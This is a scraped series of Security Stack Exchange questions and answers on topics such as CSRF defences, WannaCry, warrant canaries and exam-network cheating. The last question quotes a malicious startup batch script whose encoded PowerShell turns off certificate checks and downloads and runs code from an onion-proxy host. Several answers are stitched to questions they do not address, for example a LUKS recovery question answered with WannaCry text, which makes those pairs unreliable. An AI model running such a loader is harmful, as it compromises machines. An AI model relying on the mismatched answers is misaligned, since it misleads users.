touchscreen which captures the data, or similar modifications. This can be done both for switched-off and switched-on devices, but a successful attack requires that the owner is unaware of the changes and will thus enter the secret data into the device. Such an attack is also often called an evil maid attack since it could, for example, be done by the maid if one leaves the device in the hotel room. | {
"source": [
"https://security.stackexchange.com/questions/157627",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132382/"
]
} |
157,984 | I'm a complete noob when it comes to these subjects. But here goes... Let's say someone is using a VPN, TOR, or some other tool to enhance their privacy. As I understand it, you are discouraged from using plugins, various apps, and other things as it may compromise your privacy. Does this extend to anti-virus/virus protection as well? If someone such as a hacker or the NSA didn't want to try to crack through your VPN or anything to get your info, could they target your anti-virus/virus protection to get to your info? If not, then is it safe to use anti-virus/virus protection if you are concerned with your privacy and also use VPN/TOR? | Any software you install on your system can compromise the system and thus affect security and privacy. This can be done either willingly or because of bugs in the software. And this is doubly true for software which runs with elevated privileges, as antivirus software usually does. And while antivirus software is meant to protect you, it often has critical bugs which might make your system actually less secure. For more information read High-severity bugs in 25 Symantec/Norton products imperils millions from 2016, Critical flaw in ESET products shows why spy groups are interested in antivirus programs from 2015, Google bod exposes Sophos Antivirus' gaping holes from 2012 or Google researcher blasts Trend Micro for massive Antivirus security hole from 2016, just to name a few. Apart from that, many antivirus products inspect HTTPS connections, since encrypted connections are also used to transfer malware. And sometimes they implement this inspection in the wrong way and thus make man-in-the-middle attacks possible which were not possible before. Read The Security Impact of HTTPS Interception for more details. | {
"source": [
"https://security.stackexchange.com/questions/157984",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/146505/"
]
} |
158,045 | Is it possible to prevent CSRF by checking the Origin and Referer headers? Is this adequate, provided that requests with neither are blocked? | Expanding on the answers of @Sjoerd and @lindon. Origin vs Referer vs CSRF token Most likely, the reason OWASP recommends also using a CSRF token, is that at the time when this recommendation was made - a significant portion of browsers did not yet support the Origin header. This is no longer the case, but people are chimpanzees . In order to preserve privacy, any browser request can decide to omit the Referer header. So it is probably best to only check the Origin header. (In case you want to allow for users to preserve their privacy) The Origin header is null in some cases .
Note that all of these requests are GET requests, which means they should not have any side effects. As long as you make sure the malicious website sending the requests with your browser cannot read the responses, you should be fine. This can be ensured using proper CORS headers. (Do not use Access-Control-Allow-Origin: * !) To prevent "click-jacking", set the header X-Frame-Options: DENY . This will tell your browser that it is not allowed to display any part of your website in an iframe. The "new" approach Setting Cookie properties SameSite=lax or SameSite=strict will prevent CSRF attacks. This is a quite new feature though, and cannot be used alone, simply for the reason that not all common browsers support it yet. You can track support HERE . When the browsers do, people will likely still recommend checking Origin/Referer/CSRF tokens. If they do - without giving a good reason, it is likely because they are chimps. | {
"source": [
"https://security.stackexchange.com/questions/158045",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53622/"
]
} |
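As a rough illustration of the checks described above, the sketch below validates the Origin (or, failing that, the Referer) header against an allow-list and emits the SameSite cookie and X-Frame-Options headers. The origin value, cookie name, and function names are assumptions made for the example and do not come from any particular framework.

from urllib.parse import urlparse

ALLOWED_ORIGINS = {"https://www.example.com"}   # assumed site origin

def is_state_change_allowed(headers: dict) -> bool:
    # Block state-changing requests whose Origin/Referer is absent or foreign.
    origin = headers.get("Origin")
    if origin:
        return origin in ALLOWED_ORIGINS
    referer = headers.get("Referer")
    if referer:
        parsed = urlparse(referer)
        return f"{parsed.scheme}://{parsed.netloc}" in ALLOWED_ORIGINS
    return False    # neither header present: reject, as the question proposes

def security_headers(session_id: str) -> list:
    return [
        # SameSite keeps the session cookie off cross-site requests.
        ("Set-Cookie", f"session={session_id}; Secure; HttpOnly; SameSite=Lax"),
        # Refuse to be framed, mitigating click-jacking.
        ("X-Frame-Options", "DENY"),
    ]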
158,075 | According to the OWASP Auth Guidelines , "An application should respond with a generic error message regardless of whether the user ID or password was incorrect. It should also give no indication to the status of an existing account." However, I have found that many popular web apps violate this guideline by showing a message that the account does not exist. So what is going on here? Are Google, Microsoft, and Slack doing something insecure or is the OWASP Guideline useless? | This is a consideration between security and usability, and therefore there is not really a right answer here. So here follows my opinion. If you can keep usernames secret, then do so. In this case there is no way to figure out whether a username exists, and the login reacts the same whether a user exists or not. Note that this also means taking the same amount of time to return an error message. This behavior may not be possible. For example if users can register themselves and choose their own username, you have to notify them when a username already exists in the system. If this is the case, make the login as easy to use as possible by providing the most detailed error message. If someone can figure out whether a user exists using the registration function, there is no use in hiding this at the login. | {
"source": [
"https://security.stackexchange.com/questions/158075",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11536/"
]
} |
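One way to act on this advice is to return a single generic message and to spend roughly the same time on unknown usernames as on wrong passwords. The sketch below does that with a dummy hash record; the user store, the algorithm, and the iteration count are illustrative assumptions only.

import hashlib, hmac, os

USERS = {}   # username -> (salt, stored_hash), filled in by registration code
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hashlib.pbkdf2_hmac("sha256", b"dummy", _DUMMY_SALT, 100_000)

def login(username: str, password: str) -> str:
    # Unknown users get a dummy record so a hash is always computed.
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    valid = hmac.compare_digest(candidate, stored) and username in USERS
    # Identical wording whether the user does not exist or the password is wrong.
    return "Signed in." if valid else "Invalid username or password."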
158,126 | I know that the browser's default protocol to access any site is http:// when https:// is not explicitly mentioned, but even then, if we browse to a website, say www.facebook.com , the response header from the Facebook servers would have HSTS mentioned and our browser would direct us from http:// to https:// , so why do we need another plugin to do this when the browser itself does this for the user? What is the purpose of HTTPS Everywhere when our browser does its job by default? | HSTS uses a Trust on First Use model. If your first connection to the site was already compromised, you may not receive an HSTS error on subsequent requests. HTTPS Everywhere plugs this hole by letting your browser know that the site is an HTTPS-only site from the first connection. Also, some websites don't advertise an HSTS header even when they support HTTPS. Or they may serve their HTTPS version on a different domain/path (e.g. http://www.example.com but https://secure.example.com ); HTTPS Everywhere attempts to help with these situations by rewriting the site's URLs. | {
"source": [
"https://security.stackexchange.com/questions/158126",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/118511/"
]
} |
158,224 | A friend of mine is taking a UNIX systems class and mentioned to me that when they take exams they do so on their computers. That is, all students are using their own computer/laptop. Students are not being provided a computer by the professor. In an attempt to prevent cheating and googling of the answers, all students are required to connect to a router that the professor has set up in order to take the exam. This router is not connected to the internet. If anyone disconnects from the router during the exam time, the professor then knows that they were potentially trying to use the internet. Apparently he has told his class that this system is "foolproof" and is so confident in its ability to prevent student network access that he often leaves the room during the exam. I admit that I'm not particularly well versed in this area of networking, but theoretically couldn't this safeguard be defeated by using something resembling a man-in-the-middle attack? You spoof a MAC address and IP and send that to the target router, which then thinks you are connected even though there is no real connection? Or is this problem network card based, where the vast majority of computers only have 1 wifi card and can therefore only do network related tasks for 1 network at a time? | Well, obviously it's not "foolproof" . Depending on your capabilities, there are plenty of ways to cheat. Your professor has a point in that your standard wireless network card won't simply support a simultaneous connection to multiple different APs, thus preventing you from using that particular interface for an Internet connection. (Although with some tinkering you could possibly alternate between networks without letting the professor's AP take notice by tweaking your driver to omit the layer-2 management frames that are supposed to notify the AP of your intent to dis-/reassociate.) However, there are also easy workarounds: Build in a second network adapter (or plug in an external USB one, once the professor leaves) to connect to a network with Internet access. You can easily do this without interrupting your existing connection. Connect with your phone or another device instead of your real computer. On that device you can configure the broadcasted MAC address to match the one of your computer. This could fool your professor but probably wouldn't withstand a forensic investigation of the traffic. Use Bluetooth. Most laptops have built-in BT, so you could just tunnel your traffic via BT to a hidden device that itself is connected to the internet. Get creative. There are plenty of ways to bridge an apparent air gap. You might use your sound card to transmit data in a small range (or even your hard drive for that matter) - but then again you could also spend that time studying for the exam. One effective countermeasure might be capturing every student's screen during the exam, but personally I find that very intrusive. Ultimately, if the professor allows students to use their own computers there will always be some way to prepare the devices to cheat. | {
"source": [
"https://security.stackexchange.com/questions/158224",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/146774/"
]
} |
158,228 | When making complex passwords backlashes and forward slashes are often not allowed. I assume this has to do with errors it probably generates with the db which might not recognize it but I'm not sure. What is the reason for limiting passwords from using backlashes and forward slashes | Well, obviously it's not "foolproof" . Depending on your capabilities, there are plenty of ways to cheat. Your professor has a point in that your standard wireless network card won't simply support a simultaneous connection to multiple different APs, thus preventing your from using that particular interface for an Internet connection. (Although with some tinkering you could possibly alternate between networks without letting the professor's AP take notice by tweaking your driver to omit the layer-2 management frames that are supposed to notify the AP of your intent to dis-/reassociate.) However, there are also easy workarounds: Build in a second network adapter (or plug in an external USB one, once the professor leaves) to connect to a network with Internet access. You can easily do this without interrupting your existing connection. Connect with your phone or another device instead of your real computer. On that device you can configure the broadcasted MAC address to match the one of your computer. This could fool your professor but probably wouldn't withstand a forensic investigation of the traffic. Use Bluetooth. Most laptops have built-in BT, so you could just tunnel your traffic via BT to a hidden device that itself is connected to the internet. Get creative. There are plenty of ways to bridge an apparent air gap. You might use your sound card to transmit data in a small range (or even your hard drive for that matter) - but then again you could also spend that time studying for the exam. One effective countermeasure might be capturing every student's screen during the exam, but personally I find that very intrusive. Ultimately, if the professor allows students to use their own computers there will always be some way to prepare the devices to cheat. | {
"source": [
"https://security.stackexchange.com/questions/158228",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/81532/"
]
} |
158,239 | I have a web application and I have implemented a check on the browser to ensure that a user sets only strong passwords.
A company that we have called to check security vulnerabilities pointed out that this is not enough because using some hacking a user can ignore the check and set a weak password. I do not understand how this can be a security vulnerability.
Why would someone hack the security check just to set a weak password?
Someone expert enough to hack the web application will understand the importance of using a strong password. The only reason I can think is that someone, very very lazy, can decide to hack the check just to have an easier password to remember. I do not know how likely is this case. I know that you cannot enforce a strong password on the client side and that if you are required to have a strong password in any circumstance, you have to do it on the server side. My point is: given that, to have an acceptable user experience, we have to do the check on the client side, there has to be a good reason, a real use case that creates a possible vulnerability to justify a duplication of the check on the server side. Reading the answers, so far, it seems that the only use case that can create a vulnerability is when the javascript does not work. This does not seem a problem for me because the submit button is disabled by default. | You’re assuming that the check is bypassed on purpose. It could be the case that someone is using a browser which fails to handle the script properly or with scripts disabled, possibly even without knowing this. You seem to have a reason for people to use strong passwords. If you do so, why accept that people can bypass it? Client-side validation can be helpful from a usability perspective, but if you decide that a minimum password strength is required, you should enforce it by implementing it server-side. | {
"source": [
"https://security.stackexchange.com/questions/158239",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95908/"
]
} |
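A server-side re-check of the policy is small enough that there is little reason to skip it; the client-side check then remains purely a usability aid. The specific policy below (minimum length plus three character classes) is an assumed example, not the poster's actual rules.

import re

def password_is_strong(password: str) -> bool:
    if len(password) < 12:
        return False
    classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]"]
    return sum(bool(re.search(c, password)) for c in classes) >= 3

def handle_registration(form: dict):
    # Runs for every submission, even when client-side JavaScript was
    # disabled, broken, or deliberately bypassed.
    if not password_is_strong(form.get("password", "")):
        return 400, "Password does not meet the strength requirements."
    return 200, "OK"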
158,559 | Say I had a database that looked like this: Name Password hash (bcrypt) Status
--------------------------------------------------------------------------------
Dave $2y$10SyyWTpNB.TyWd3nM hQ41frOtObcircAb3nJw1Cf9dC6CT7tVIEb6XS Standard
Sarah $2y$10$fUJrNA200sXgWUJAP7XEiuq4itHa43Y8QVIpc/YWscgVJ PYWbLLV. Admin
Mike $2y$10$01jx7u7hnfKOzBYyjNWskOPQ23w1Cf1gNiv42wsKqXKOf8filzS02 Standard If an attacker gained access to this database, then they would immediately see that Sarah is an admin, and would probably focus on breaking that password, so they could have more power. Is there any way I could somehow hide whether or not someone is an admin in the database so that an attacker would not know who the admins are? I could simply hash the value (standard or admin) but that would only give 1 bit of entropy, and I would hope to get a bit more security than that. | I would say this is a bit too much trouble considering what you get out of it. I think when the attacker has access to the database you have way bigger problems. Obfuscating the admin status of a user will just cost the attacker some extra time, but an APT (Advanced Persistent Threat) would probably not be deterred by this fact. | {
"source": [
"https://security.stackexchange.com/questions/158559",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132382/"
]
} |
158,655 | Most of our publishers sell subscriptions to institutions and people get access by being identified as part of the institution.
This institution authentication happens with IP ranges or Shibboleth, but not all institutions support Shibboleth or other SAML, and IP ranges do not help without VPN or proxy server. So, publishers want us to devise a scheme by which a user will gain short term access to his institutional holding (that is, to the content subscribed by his institution) while he is outside the IP range of the institution (e.g. at home or traveling.) The solution needs to be as simple as possible for the user, it should not require that they download anything and it should work well for users coming from mobile phones or from their laptops. The process could require that the users initiate this access while inside the IP range, but ideally, they should be able to initiate their 30 day access even if they are away from the institution and forgot to set it up. In particular, please state how the user will assert that he is a member (faculty, student, employee, whatever) of the institution that he claims. Remember, that the institution has no authentication server and will not install one. Also, the user will not install an application on his computer.
The complete solution will invariably involve a persistent cookie at some point. How would you prevent someone from selling his persistent cookie to someone who is not an institution member and wants to gain access? | Can you prevent someone from selling their password to get similar access? Do you think you need to? It's pretty much equivalent. Do you need to do this? From my experience being inside/outside academic institutions with journal access, there's always some amount of sharing resources as a favour (e.g. "hey, could you send me a PDF of this paper?"). You'll never be able to stop that, because it is actually being manually accessed by a legitimate user on a correct machine. However, I have personally never witnessed student/staff trying to make money from this. Monitoring Even if they wanted to make money like this, then I don't think sharing cookies is the best way - it's certainly not how I'd do it! Protections you could add to the cookie system (e.g. fingerprinting the user's browser and checking it stays the same, etc.) won't apply to other methods. Instead (if this is actually a problem), a reasonable and robust solution is to monitor user's usage patterns. If they are downloading 100x the resources of anyone else, or if they fetch resources consistently for 250 hours straight (the longest humans can survive without sleep), then there's probably multiple users or an automated system at work. However, this monitoring solution doesn't have to be included from the beginning, it can be added in later - and until you have evidence that it's actually a problem, I think it should be quite far down your list of things to do. | {
"source": [
"https://security.stackexchange.com/questions/158655",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/147294/"
]
} |
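The usage-pattern monitoring suggested above can start out very simple. The toy sketch below flags accounts whose daily download count is far above the typical account; the log format and the multiplier are invented for the example.

from collections import Counter
from statistics import median

def flag_heavy_accounts(download_log, factor: int = 100) -> set:
    # download_log: iterable of (account_id, resource_id) events for one day.
    counts = Counter(account for account, _ in download_log)
    if not counts:
        return set()
    typical = median(counts.values())
    return {acct for acct, n in counts.items() if n > factor * typical}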
158,769 | I am interested in watermarking a video for copyright purposes. The requirements are as follows: The watermark must be barely noticeable to the naked eye. The watermark must be able to be extracted from a device such as a smartphone camera. Embedding a secret message where the raw data is available is fairly simple. It seems much harder when the data must be extracted from an external source where the details of the pixels are easily lost. Is this a hopeless effort? | Your use case calls for a robust watermarking scheme. It has to resist compression and decompression of the image, has to resist modification (e.g. white balance changes, lost pixels) and also geometrical variation due to the hand-held device capture not being perfect. Robustness usually comes at the expense of invisibility and capacity. Since there is a need for identification and the robustness requirements are really strong, you are unlikely to find a scheme that respects all your demands given the current state of the art. As a reference: A Survey of Digital Watermarking Scheme ( Google cache ). | {
"source": [
"https://security.stackexchange.com/questions/158769",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/147410/"
]
} |
159,331 | There's a new strain of attacks which is affecting a lot of systems around the world (including the NHS in the UK and Telefonica in Spain) which is being called "WannaCry" amongst other names. It seems to be a standard phishing/ransomware attack, but it's also spreading like a worm once it gets into a target network. How is this malware compromising people's systems and what's the best way for people to protect themselves from this attack? | WannaCry attacks are initiated using an SMBv1 remote code execution vulnerability in the Microsoft Windows OS. The underlying vulnerability was patched by Microsoft on March 14, and the EternalBlue exploit was made publicly available through the "Shadowbrokers dump" on April 14th, 2017. However, many companies and public organizations have not yet installed the patch on their systems. The Microsoft patches for legacy versions of Windows were released last week after the attack. How to prevent WannaCry infection? Make sure that all hosts have enabled endpoint anti-malware solutions. Install the official Windows patch (MS17-010) https://technet.microsoft.com/en-us/library/security/ms17-010.aspx , which closes the SMB Server vulnerability used in this ransomware attack. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Make sure MS17-010 patches are installed. Back up all important data to an external hard drive or cloud storage service. More information here: https://malwareless.com/wannacry-ransomware-massively-attacks-computer-systems-world/ | {
"source": [
"https://security.stackexchange.com/questions/159331",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
159,379 | A person has a form that asks for a name and password. The password is sent to the server where a hash is created from hashing the name and password. This hash is converted into a number using the ascii value. The number is limited to 10 digits, and is used to seed a random number generator. Three random numbers are generated from 1-77616. These numbers are used to select words from a list of 77616 English words. The three words formed are used as the person's username. 77616^3 is roughly 2^48, so the probability of a collision after a million username generations should be ~0.001774778278169853. Does this seem like a secure way to manage users, that way a login/register system doesn't have to be implemented? Is there any benefit of using this kind of system over a traditional login/register system? | No, this doesn't seem secure. Collisions Mersenne Twister is a deterministic RNG, so it's not suitable for most cryptographic tasks (although its usage makes sense here, because if it weren't deterministic, your approach would of course not work). In this case, collisions would not happen at the stage you assume and base your calculations on. Instead, they would happen when you limit the ascii value to 10 digits, so the probability of collisions is way higher than you assume. Comments on Approach What you have is basically a home-made hashing function. You take some input, you apply some function(s) to it, and receive a fixed-length (3 words) output. The input space is larger than the output space, and it is impossible to reverse the procedure (get the password from the three stored words). Don't roll your own and Don't be a Dave apply. To properly hash passwords, see How to securely hash passwords? . You are still implementing a login and registration system (a user needs to enter username and password, you store it in some form, and can then later compare the stored value to newly entered values to authenticate the user). If you would stop at this step: "The password is sent to the server where a hash is created", you would have an ordinary process. But instead, you add additional steps, which do not increase, but decrease, security. | {
"source": [
"https://security.stackexchange.com/questions/159379",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148184/"
]
} |
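For contrast with the home-made construction above, this is roughly what a standard salted, deliberately slow password hash looks like using only the Python standard library. The iteration count is a typical ballpark figure, not a tuned recommendation.

import hashlib, hmac, os

def hash_password(password: str):
    salt = os.urandom(16)    # unique random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest      # store both alongside the username

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, stored)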
159,397 | After reading this question , I am now wondering if the WannaCry malware can infect a Linux OS, especially Ubuntu. One of the answers talked about SMB2 and Windows. Does it mean a Linux-based computer is safe? (Beside the side effects, Wine, and being a conveyor) | WannaCry exploits a set of flaws in Microsoft's implementation of the SMB1 protocol. Since these are implementation flaws rather than structural flaws in the protocol itself, Linux systems cannot be automatically infected, but they can be affected if the malware is manually installed and run. This is true regardless of whether the systems are running Samba, Wine, or any other Windows-emulation layer. | {
"source": [
"https://security.stackexchange.com/questions/159397",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148209/"
]
} |
159,445 | I would prefer that no one, even me, could encrypt my files. I have no use for it, and don't want it. Is there a way to permanently disable any sort of encryption at the OS level? If not, is this a possible improvement that a future file system could incorporate? Or is it fundamentally impossible to prevent? | Read-only file systems can by definition not be written to (At least not digitally. What you do with a hole puncher and a neodymium magnet is your own business). Examples: Live CDs, from which you can boot into an operating system which will look the same on every boot. WORM (Write Once Read Many) devices, used for example by financial institutions which have to record transactions for many years with no means of altering or deleting them digitally. Writable partitions mounted as read-only. This can of course be circumvented by a program with root access. Versioning file systems would be more practical, but are not common. Such systems might easily include options to transparently write each version of a file (or its difference from the previous version) to a WORM device or otherwise protected storage. Both of these solve the underlying issue: Not losing the original data in case of encryption by malicious software. | {
"source": [
"https://security.stackexchange.com/questions/159445",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148256/"
]
} |
159,554 | While browsing VeraCrypt's website I found its warrant canary . I tried to understand what it is and what its purpose was by reading corresponding Wikipedia article . To be honest I find it quite confusing. Can someone explain what a warrant canary is in a bit less complicated way than Wikipedia does? | Governments may issue secret government subpoenas to communication providers that force them to disclose private data about their users or insert backdoors into their products. Furthermore, governments may give criminal penalties to an organization that chooses to publicly disclose if a subpoena was issued. Some tech organizations attempt to get around this by regularly issuing "we have never been issued any such government subpoenas" while signing their messages with their private key. This message is called a warrant canary, with an analogy to a canary in a coal mine. (If the mine begins to fill up with poisonous gases, the small canary will feel its effects before humans and serves as a warning to everyone to get out of the coal mine). If the government issues a subpoena to them, they promise they will stop issuing the cryptographically signed message stating "we have never been issued any secret gov't subpoenas". While the law allows the gov't to penalize them for disclosing information about a secret subpoena, there is (currently) no law that would require them to continue issuing such warrant canaries. Granted, it's feasible for a gov't court to secretly force an organization to give up their private keys that were used to sign their warrant canary, or require them to continue publishing their warrant canaries or suffer severe consequences; whether this happens in practice is not publicly known. It's also possible that the people issuing the warrant canary are not trustworthy people and would voluntarily continue to issue them, even while complying with government subpoenas. For more information check out these links from the comments: https://www.yalelawjournal.org/forum/warrant-canaries-and-disclosure-by-design https://law.stackexchange.com/questions/268/what-is-the-legal-status-of-warrant-canaries | {
"source": [
"https://security.stackexchange.com/questions/159554",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11996/"
]
} |
159,725 | When I'm developing a webapp, let's say a Django site, I run it locally and typically access it at http://localhost . I thought this was inherently secure because I assumed that localhost can only be accessed locally. However, I discovered that even running a local web server (Apache, Nginx...) with a self-signed HTTPS certificate won't help because localhost is not really required to be local: In empirical testing, we've seen multiple resolvers... send localhost queries to the network... As a result accessing " https://localhost ", say, on a hostile WiFi access point (such as your coffee shops) can be intercepted by a network attacker and redirected to a site (or a certificate) of their choosing. (In email chain " Exception to Baseline Requirements, section 7.1.4.2.1 ".) If I'm developing a webapp, I need to run it locally and access it through a browser. Sometimes I need to do this at a coffee shop with an internet connection. What access point should I use, if not localhost? Note Some of my desktop applications also expose themselves via HTTP at other ports, for example http://localhost:9000 . Presumably I shouldn't access those at a coffee shop either? | Safely developing against localhost can be done provided: your machine is configured to resolve localhost to a loopback address (note, it's possible to change your hosts file to resolve localhost to a different address) your machine is configured to route the loopback address via the loopback interface (it's possible to route loopback addresses to a non-loopback interface) you configure your application to listen on the loopback address, not 0.0.0.0 (many web frameworks listen on 0.0.0.0 by default; this is probably the most common reason for unexpectedly exposing services to an untrusted network during development) if you use a proxy, your browser is configured not to route localhost/loopback through the proxy In other words, a fairly typical networking configuration. Also, take care that your database server isn't binding to 0.0.0.0, as that'll allow anyone on the network to connect directly to the database server. It's probably best to set a firewall configuration so you know exactly which ports and addresses your local services are listening on. The link you pointed to is in the context of a publicly trusted CA issuing certificates with the "localhost" name. This is unsafe in that context because the recipient of such a certificate may use the certificate to intercept the communication of someone with some unusual networking configurations. When you have full control over your own machine's configuration and you know that you don't have some weird configurations on your machines, the loopback interface is safe. | {
"source": [
"https://security.stackexchange.com/questions/159725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7062/"
]
} |
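The single most important point above for local development is the bind address. A stand-in sketch with the standard library; the same idea applies to Django's runserver or any other dev server, and the port is arbitrary.

from http.server import HTTPServer, SimpleHTTPRequestHandler

# Reachable only from this machine:
dev_server = HTTPServer(("127.0.0.1", 8000), SimpleHTTPRequestHandler)

# By contrast, ("0.0.0.0", 8000) would accept connections from anyone on the
# same, possibly hostile, network: the common mistake called out above.
dev_server.serve_forever()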
159,878 | First things first, I'm not asking this question because of any specific alarm on my PC that I suspect to be false. It's just that from the perspective of the software industry, it would make some sense to implement false alarms every now and then, give paying users the wrong feeling that they really do need the antivirus software, and thereby keep them paying for updates, even if there never was an actual threat on the system. Are there any known cases of something like this happening? | The problem with deliberately triggering false alarms is that users will at some point lose trust in the AV software. The rates of false positives are also an important factor in AV rankings - and these rankings potentially influence users' buying decisions. So legitimate AVs will probably offer you potentially unnecessary bonus features rather than pretending there is a concrete dangerous infection that can only be fixed with an expensive upgrade. (Software that constantly warns about non-existent threats would get into the realm of scareware .) The reported story from 2015 that Kaspersky employees had submitted mocked-up records to VirusTotal to trigger false positives in competing AVs shows how important good detection rates are for an AV company's reputation: Two former Kaspersky employees have accused the company of faking malware to harm rival antivirus products. They would falsely classify legitimate files as malicious, tricking other antivirus companies that blindly copied Kaspersky's data into deleting them from their customers' computers. (Source) That said, many AV companies have been criticized for unethical behavior. E.g., Symantec (the company behind Norton Antivirus) has been alleged to have charged unapproved extra fees and pretended to "remove" non-existent malware: Symantec has been criticized by some consumers for perceived ethical violations, including allegations that support technicians would tell customers that their systems were infected and needed a technician to resolve it remotely for an extra fee, then refuse to refund when the customers alleged their systems had not actually been infected. (Source) | {
"source": [
"https://security.stackexchange.com/questions/159878",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148742/"
]
} |
160,097 | I understand that WannaCry spreads itself by exploiting the SMBv1 vulnerability, which is fixed by patch MS17-010. Does this mean that even with the patch installed, WannaCry can still infect the computer--if the user downloads and executes it--but not propagate itself through the computer's network? Does Windows Defender/any current security software block the execution of WannaCry if, say, a user executes it? | If you download and execute WannaCry, it will still lock your files and attempt to infect other unpatched computers in the network. WannaCry only needs the SMB exploit to get into a system, not to get out. Once it has control of your system, it does not need the exploit to execute arbitrary code, including the worm. The MS17-010 patch protects your computer from being infected through this exploit, but it does not prevent your computer from infecting other machines on the same network if those other machines are not patched. To protect other computers on the network, you need to block all outgoing traffic to port 445. I've not (yet) seen WannaCry try and circumvent a blocked outgoing port. There are several variants of WannaCry out there. These all seem to be detected by major antivirus software, including Windows Defender. You can see a full list of antivirus software that detect a particular version on Virus Total, e.g. for this sample . comae.io seems to have a decent compilation of variants found in the wild which you can search for on Virus Total. | {
"source": [
"https://security.stackexchange.com/questions/160097",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148989/"
]
} |
160,112 | I have a dd of a computer which has a LUKS-encrypted partition. I do not have the password but I do have a recovery key which would allow me to change the password through a GUI interface when the computer is booted. Unfortunately, I no longer have direct access to the source computer to reset the password. What I wish to do is reset the password using the recovery key so I can then access the data. I can obviously dump the dd copy to a HDD and boot the system but is there a way to reset the LUKS password with the recovery key through a CLI? I am thinking the ideal scenario is to mount the DD and then reset the password. | If you download and execute WannaCry, it will still lock your files and attempt to infect other unpatched computers in the network. WannaCry only needs the SMB exploit to get into a system, not to get out. Once it has control of your system, it does not need the exploit to execute arbitrary code, including the worm. The MS17-010 patch protects your computer from being infected through this exploit, but it does not prevent your computer from infecting other machines on the same network if those other machines are not patched. To protect other computers on the network, you need to block all outgoing traffic to port 445. I've not (yet) seen WannaCry try and circumvent a blocked outgoing port. There are several variants of WannaCry out there. These all seem to be detected by major antivirus software, including Windows Defender. You can see a full list of antivirus software that detect a particular version on Virus Total, e.g. for this sample . comae.io seems to have a decent compilation of variants found in the wild which you can search for on Virus Total. | {
"source": [
"https://security.stackexchange.com/questions/160112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149006/"
]
} |
160,235 | I am in the process of writing a security vulnerabilities report on an application used at my employer, having completed an application audit. One discovered vulnerability can lead to unauthorized deletion / destruction of data. In the context of the CIA security principles,I associate integrity to be concerned with safeguarding data from unauthorized modification, such as through MITM and availability with safeguarding data from DoS such as through smurf or teardrop attacks. I am inclined to say that unauthorized deletion of data is an attack on Availability principle given the data can no longer be accessed by legitimate users. However, one of my colleagues disagrees and considers such to be an attack on the Integrity principle, because data was modified by being destroyed without authorization . Is the unauthorized deletion of data considered a breach of integrity or availability? | However, one of my colleagues disagrees and considers such to be an attack on the Integrity principle, because data was modified by being destroyed without authorization. Your colleague has a point. Unauthorized data deletion is foremost a breach of integrity since deletion can be considered a special case of modification. This can have an impact on availability, but it doesn't have to. E.g, an attacker who manages to delete all logfiles on a web server probably wouldn't impact the server's uptime. But obviously a breach of integrity often implies impaired availability since a service with corrupted resources will likely not function properly. I wouldn't always force a vulnerability into one of the three CIA categories, though. The impact of unauthorized data deletion is quite obvious, so I'm not sure categorizing it according to the CIA triad adds any clarification. Also note that there are many alternative models such as the Parkerian hexad that give you a few more options to choose from. | {
"source": [
"https://security.stackexchange.com/questions/160235",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106510/"
]
} |
160,372 | A piece of code was running on my Windows machine at startup. I would like to know exactly what this code is doing; it seems to refer to something like crackbook? @echo off
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )
